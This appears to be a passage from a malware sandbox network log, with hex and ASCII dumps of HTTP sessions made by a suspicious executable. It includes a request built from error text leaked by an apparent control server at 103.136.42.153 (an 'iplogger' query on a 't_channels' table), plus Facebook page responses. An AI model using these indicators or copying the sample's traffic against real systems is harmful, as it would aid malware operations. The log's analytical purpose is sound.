2022-10-07 13:59:25 UTC	728	IN	Data Raw: 37 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 59 74 55 33 43 35 75 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 65 39 41 4e 7a 77 2f 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 38 77 38 4b 32 34 5a 22 5d 7d 29 3b 7d 29 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 73 65 74 50 61 67 65 49 44 28 22 37 31 35 31 37 36 39 37 39 36 35 39 35 38 36 33 37 31 34 22 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 32 32 62 63 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 65 4d 4f 32 74 4a 33 69 22 3e 28 66 75 6e 63 74 69 6f Data Ascii: 7","RPLH8jg","zPLgIGT","srPmdt4","R5w1rCJ","YtU3C5u","CGkH4FY","e9ANzw/","07JSiP0","8w8K24Z"]});}));</script><script>requireLazy(["__bigPipe"],function(bigPipe){bigPipe.setPageID("7151769796595863714")});</script>22bc<script nonce="eMO2tJ3i">(functio
2022-10-07 13:59:25 UTC	729	IN	Data Raw: 45 34 38 6f 35 74 52 72 4f 76 5a 51 34 77 50 78 69 63 6c 55 4d 78 55 6d 53 4f 79 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 34 35 38 31 31 33 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 30 48 69 34 44 38 4c 79 4b 46 4f 30 6f 56 49 34 5a 4d 76 6d 42 4b 71 59 48 66 35 4e 43 41 70 67 59 6c 34 6f 68 77 79 63 57 65 67 2d 65 32 37 77 42 78 42 6d 59 35 6d 54 5f 30 2d 31 50 31 31 56 53 50 5a 6f 34 7a 48 72 35 2d 5f 64 4a 78 57 69 37 39 6d 31 48 71 59 50 61 4e 49 4a 30 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 36 39 39 33 30 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 6a 6e 38 6a 44 34 71 6e 72 71 33 38 50 7a 2d 50 67 4c 42 4f 48 4b 37 46 4b 39 53 5a 71 76 6e 64 59 64 2d 66 2d 66 66 6b 2d 4c 6c 43 66 4b 78 69 69 5f 77 55 37 Data Ascii: E48o5tRrOvZQ4wPxiclUMxUmSOyY"]},-1],["cr:1458113",[],{__rc:[null,"Aa0Hi4D8LyKFO0oVI4ZMvmBKqYHf5NCApgYl4ohwycWeg-e27wBxBmY5mT_0-1P11VSPZo4zHr5-_dJxWi79m1HqYPaNIJ0"]},-1],["cr:1069930",[],{__rc:[null,"Aa1jn8jD4qnrq38Pz-PgLBOHK7FK9SZqvndYd-f-ffk-LlCfKxii_wU7
2022-10-07 13:59:25 UTC	731	IN	Data Raw: 72 63 3a 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 41 61 31 6a 6e 38 6a 44 34 71 6e 72 71 33 38 50 7a 2d 50 67 4c 42 4f 48 4b 37 46 4b 39 53 5a 71 76 6e 64 59 64 2d 66 2d 66 66 6b 2d 4c 6c 43 66 4b 78 69 69 5f 77 55 37 2d 62 4a 46 36 38 41 45 34 38 6f 35 74 52 72 4f 76 5a 51 34 77 50 78 69 63 6c 55 4d 78 55 6d 53 4f 79 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 35 31 35 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 32 4e 68 6f 57 4f 6e 62 6f 35 39 63 45 64 57 34 61 6b 79 61 32 76 57 6e 77 37 62 4c 48 7a 43 61 45 42 37 78 58 4d 6b 71 57 38 35 69 4c 30 67 55 78 6f 61 6e 76 30 4c 62 45 6b 76 59 58 66 37 52 74 76 55 52 47 38 45 74 6f 46 35 43 6c 4d 66 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 Data Ascii: rc:["LayerHideOnTransition","Aa1jn8jD4qnrq38Pz-PgLBOHK7FK9SZqvndYd-f-ffk-LlCfKxii_wU7-bJF68AE48o5tRrOvZQ4wPxiclUMxUmSOyY"]},-1],["cr:1105154",[],{__rc:[null,"Aa2NhoWOnbo59cEdW4akya2vWnw7bLHzCaEB7xXMkqW85iL0gUxoanv0LbEkvYXf7RtvURG8EtoF5ClMfQ"]},-1],["Banza
2022-10-07 13:59:25 UTC	732	IN	Data Raw: 43 54 7a 5f 46 39 78 73 73 72 73 70 7a 52 35 71 32 76 70 67 79 7a 63 75 6e 77 47 6f 47 30 57 63 52 42 79 77 54 74 39 49 63 33 78 45 43 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 43 6f 72 65 57 61 72 6e 69 6e 67 47 4b 22 2c 5b 5d 2c 7b 66 6f 72 63 65 57 61 72 6e 69 6e 67 3a 66 61 6c 73 65 7d 2c 37 32 35 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 36 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 2c 22 41 61 31 79 70 73 36 79 35 4c 7a 41 64 46 47 46 52 78 55 38 49 58 6c 47 52 56 7a 67 75 51 69 43 31 68 2d 63 67 5f 65 53 6e 77 48 50 53 67 30 43 78 69 51 46 5f 5a 30 49 4a 51 50 64 67 41 32 6c 71 49 62 6e 43 4a 4b 34 59 4c 69 57 6a 6d 44 34 67 44 4f Data Ascii: CTz_F9xssrspzR5q2vpgyzcunwGoG0WcRBywTt9Ic3xECQ"]},-1],["CoreWarningGK",[],{forceWarning:false},725],["cr:1344486",["ReactDOM.classic.prod"],{__rc:["ReactDOM.classic.prod","Aa1yps6y5LzAdFGFRxU8IXlGRVzguQiC1h-cg_eSnwHPSg0CxiQF_Z0IJQPdgA2lqIbnCJK4YLiWjmD4gDO
2022-10-07 13:59:25 UTC	734	IN	Data Raw: 79 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 34 34 31 38 30 22 2c 5b 22 54 69 6d 65 53 70 65 6e 74 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 4c 6f 67 67 65 72 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 54 69 6d 65 53 70 65 6e 74 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 4c 6f 67 67 65 72 42 6c 75 65 22 2c 22 41 61 31 6a 6e 38 6a 44 34 71 6e 72 71 33 38 50 7a 2d 50 67 4c 42 4f 48 4b 37 46 4b 39 53 5a 71 76 6e 64 59 64 2d 66 2d 66 66 6b 2d 4c 6c 43 66 4b 78 69 69 5f 77 55 37 2d 62 4a 46 36 38 41 45 34 38 6f 35 74 52 72 4f 76 5a 51 34 77 50 78 69 63 6c 55 4d 78 55 6d 53 4f 79 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c Data Ascii: yY"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa1jn8jD4qnrq38Pz-PgLBOHK7FK9SZqvndYd-f-ffk-LlCfKxii_wU7-bJF68AE48o5tRrOvZQ4wPxiclUMxUmSOyY"]},-1],["cr:1187159",["BlueCompatBroker"],
2022-10-07 13:59:25 UTC	735	IN	Data Raw: 30 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 Data Ascii: 0'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5
2022-10-07 13:59:25 UTC	737	IN	Data Raw: 6a 67 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 47 70 51 46 42 77 4c 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 63 59 55 33 63 33 32 22 2c 22 42 49 79 6c 4b 43 34 22 5d 7d 29 3b 7d 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: jg","n6W4xMH","GpQFBwL","vGt2mxz","h3ZzAmG","dAxX0jj","mRpDwmd","cYU3c32","BIylKC4"]});}));</script></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49714	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:59:28 UTC	737	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:59:28 UTC	739	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: 31pUE67nBV4C9nwmqp/3sI1pvW50kQJjBIGAu6J3pG92wchuI0dln+nx2AlUF0dYMVy+mOsvwaHEna7Ny5tJ7Q== Date: Fri, 07 Oct 2022 13:59:28 GMT Priority: u=3,i Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:59:28 UTC	739	IN	Data Raw: 31 36 65 38 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 37 79 44 54 42 37 68 53 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 Data Ascii: 16e81<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="7yDTB7hS">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requ
2022-10-07 13:59:28 UTC	740	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 29 72 65 74 75 72 6e 3b 62 2e 49 5f 41 4d 5f 49 4e 43 4f 47 4e 49 54 4f 5f 41 4e 44 5f 49 5f 52 45 41 4c 4c 59 5f 4e 45 45 44 5f 57 45 42 53 51 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 28 61 2c 62 2c 63 2c 64 29 7d 3b 77 69 6e 64 6f 77 2e 6f 70 65 6e 44 61 74 61 62 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 29 7d 7d 62 28 61 29 7d 29 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 79 44 54 42 37 68 53 22 3e 3c 2f 73 74 Data Ascii: (function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="7yDTB7hS"></st
2022-10-07 13:59:28 UTC	741	IN	Data Raw: 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c Data Ascii: 8b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><l
2022-10-07 13:59:28 UTC	743	IN	Data Raw: 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 Data Ascii: 2%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886
2022-10-07 13:59:28 UTC	744	IN	Data Raw: 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f Data Ascii: 1'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20colo
2022-10-07 13:59:28 UTC	746	IN	Data Raw: 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 Data Ascii: .css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="sty
2022-10-07 13:59:28 UTC	747	IN	Data Raw: 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 75 5f 6b 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 4e 52 73 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 6d 39 38 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 36 76 77 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 2d 55 73 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 Data Ascii: T4_ZQi0sTjSt-Rxu_k"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8NRs"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6m98"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK66vw"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5x-Us"},"1738486":{"re
2022-10-07 13:59:28 UTC	749	IN	Data Raw: 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d Data Ascii: 00,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom
2022-10-07 13:59:28 UTC	750	IN	Data Raw: 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c Data Ascii: version":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":nul
2022-10-07 13:59:28 UTC	752	IN	Data Raw: 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 Data Ascii: "SRT_BANZAI_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDID
